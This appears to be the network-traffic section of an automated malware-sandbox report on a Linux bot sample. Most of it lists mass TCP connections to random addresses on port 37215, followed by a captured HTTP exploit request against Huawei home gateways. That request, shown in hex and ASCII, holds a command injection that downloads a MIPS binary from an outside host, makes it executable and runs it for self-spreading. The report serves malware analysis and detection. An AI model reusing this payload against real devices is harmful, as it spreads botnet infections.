        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.30.151.130:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.200.233.18:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.244.220.125:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.81.253.181:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.148.209.198:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.247.138.192:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.71.184.239:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.214.211.61:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.181.47.26:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.132.21.82:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.232.214.51:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.172.195.59:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.80.41.60:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.197.83.255:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.104.97.85:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.146.251.64:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.75.245.16:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.136.159.71:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.19.144.8:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.245.86.148:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.48.55.204:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.173.4.210:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.168.232.147:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.130.122.166:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.55.39.42:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.157.18.84:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.23.243.226:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.145.69.3:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.176.91.172:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.153.254.37:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.64.214.218:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.56.130.61:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.150.54.146:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.196.185.8:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.42.8.34:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.63.228.22:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.209.116.14:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.58.237.1:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.72.31.237:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.9.34.188:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.253.186.150:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.49.181.62:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.48.151.103:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.89.118.252:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.243.181.250:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.210.19.105:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.99.202.113:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.55.50.122:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.105.166.150:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.193.63.211:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.106.204.135:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.161.67.196:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.5.61.165:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.163.40.100:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.143.87.108:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.147.34.115:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.38.63.236:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.12.107.129:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.184.68.221:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.144.127.135:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.249.88.254:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.242.176.207:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.234.189.91:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.186.76.78:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.15.181.52:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.80.180.227:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.220.190.38:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.12.119.119:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.212.184.236:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.138.214.25:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.221.111.222:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.47.39.244:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.238.77.253:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.167.178.11:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.72.167.83:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.49.229.62:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.98.254.246:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.83.29.99:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.99.204.21:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.82.160.108:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.95.31.169:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.0.223.7:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.144.74.42:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.176.64.98:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.168.145.106:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.48.91.103:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.127.87.94:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.53.208.84:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.53.192.118:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.80.144.229:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.215.233.61:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.79.34.57:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.230.8.133:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.20.205.175:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.65.215.25:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.221.40.229:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.0.145.52:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.254.18.80:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.39.212.246:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.221.128.196:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.184.109.152:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.39.17.132:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.173.46.31:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.118.236.237:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.225.203.25:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.227.218.247:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.125.149.80:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.214.191.101:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.252.8.8:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.105.31.81:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.78.195.169:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.143.109.105:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.7.6.211:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.103.78.223:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.53.67.2:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.240.111.237:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.244.138.147:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.67.40.175:37215
        Source: global trafficTCP traffic: 192.168.2.23:36732 -> 2.56.59.78:5787
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.203.208.53:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.101.122.242:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.112.139.161:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.91.206.17:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.183.55.220:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.235.174.228:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.221.41.138:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.246.145.14:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.24.170.105:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.153.134.229:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.146.164.31:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.101.185.115:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.202.86.60:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.152.26.4:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.45.166.171:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.31.24.251:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.105.151.199:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.232.55.129:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.25.72.142:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.238.144.195:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.144.39.3:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.47.59.93:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.187.38.102:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.203.200.231:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.158.119.114:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.63.72.77:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.191.54.229:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.20.79.55:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.87.215.133:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.177.80.43:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.223.73.90:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.191.102.68:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.84.113.14:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.63.113.48:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.26.179.181:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.175.59.154:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.37.157.181:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.225.131.162:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.177.195.216:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.52.231.170:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.100.155.156:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.14.118.151:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.8.66.42:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.164.22.152:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.235.229.174:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.206.247.75:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.203.246.106:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.61.182.34:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.190.51.6:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.249.46.99:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.35.131.9:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.16.12.127:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.161.74.201:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.191.18.158:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.45.33.211:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.208.117.194:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.49.160.219:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.209.86.133:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.85.228.220:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.67.159.83:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.231.168.23:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.255.128.66:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.252.121.171:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.51.77.86:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.40.46.24:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.86.191.243:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.222.112.205:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.153.164.164:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.174.49.109:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.29.148.117:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.255.106.253:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.57.45.60:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.77.177.123:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.30.34.223:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.121.42.163:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.125.145.135:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.217.62.195:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.164.126.38:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.118.189.84:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.91.128.235:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.164.228.180:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.170.160.254:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.153.63.220:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.33.188.60:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.34.167.34:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.246.240.157:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.27.199.11:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.45.173.215:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.144.76.136:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.219.100.188:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.18.48.220:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.110.122.165:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.229.57.26:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.38.134.67:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.243.170.253:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.178.188.48:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.63.168.106:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.93.176.59:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.26.81.226:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.85.95.190:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.57.98.238:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.163.228.119:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.48.174.169:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.101.142.231:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.223.37.64:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.112.28.56:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.70.120.89:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.60.22.24:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.199.148.234:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.77.49.148:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.152.144.155:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.60.215.240:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.32.182.201:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.43.242.51:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.156.19.221:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.190.83.200:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.17.221.77:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.158.98.153:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.161.114.94:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.4.64.160:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.65.82.23:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.99.12.133:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.135.175.249:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.236.106.79:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.142.251.84:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.213.123.172:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.148.31.65:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.97.11.159:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.186.246.118:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.166.14.31:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.225.93.109:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.36.123.191:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.8.86.58:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.230.207.227:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.106.54.98:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.102.153.28:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.233.251.61:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.32.83.151:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.146.110.83:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.156.202.113:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.235.177.236:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.204.168.116:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.39.17.6:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.196.188.89:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.214.55.5:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.158.129.236:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.196.198.181:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.105.34.29:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.209.30.93:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.161.101.179:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.40.218.249:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.163.18.146:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.201.176.183:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.66.202.254:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.136.151.189:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.53.206.201:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.247.174.29:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.79.162.190:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.159.60.234:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.134.99.165:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.26.228.152:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.106.70.65:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.248.225.186:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.159.34.84:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.247.87.185:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.50.208.94:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 197.32.43.130:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.92.231.116:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.169.238.114:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.196.176.70:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.190.69.110:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.90.111.229:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.27.170.191:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.22.144.171:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.117.212.218:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.35.181.236:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.175.223.85:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 41.234.81.62:37215
        Source: global trafficTCP traffic: 192.168.2.23:57252 -> 156.110.220.214:37215
        Source: /tmp/1XUdzc3d3i (PID: 5221)Socket: 192.168.2.23::46157
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 